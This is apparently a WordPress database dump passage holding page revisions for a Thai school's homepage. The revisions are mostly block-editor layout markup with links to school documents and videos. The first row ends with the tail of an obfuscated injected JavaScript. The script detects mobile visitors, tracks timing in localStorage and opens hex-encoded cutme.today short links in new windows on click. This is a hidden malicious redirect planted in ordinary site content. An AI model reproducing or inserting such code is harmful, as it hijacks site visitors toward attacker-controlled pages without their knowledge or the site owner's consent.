ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 13:55:25','2024-08-28 06:55:25','',19,'http://watprato.ssk.in.th/?p=248',0,'revision','',0),
(249,2,'2024-08-29 09:18:23','2024-08-29 02:18:23','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 